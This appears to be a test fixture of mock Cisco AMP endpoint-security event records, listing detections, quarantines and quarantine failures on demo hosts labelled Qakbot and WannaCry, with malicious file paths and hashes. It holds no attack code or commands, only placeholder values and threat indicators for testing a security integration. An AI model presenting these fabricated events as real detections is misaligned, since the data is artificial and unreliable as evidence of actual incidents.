Quarantine","event_type_id":553648155,"detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068995","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"igvj$vN.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\igvj$vN.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} 